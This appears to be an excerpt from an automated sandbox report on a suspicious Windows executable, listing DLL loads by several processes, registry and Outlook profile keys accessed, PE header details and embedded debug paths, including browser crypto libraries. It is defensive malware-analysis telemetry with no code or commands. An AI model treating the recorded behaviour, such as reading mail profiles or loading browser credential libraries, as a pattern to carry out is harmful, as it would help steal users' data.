Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: sx8RE6LbG0.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: sx8RE6LbG0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296210614.0000021731FC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: mozglue.pdb source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243252016.0000021717B20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.2170329966.000000006C827000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000016.00000002.2733109861.000000006C7D7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296044980.0000021731FB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
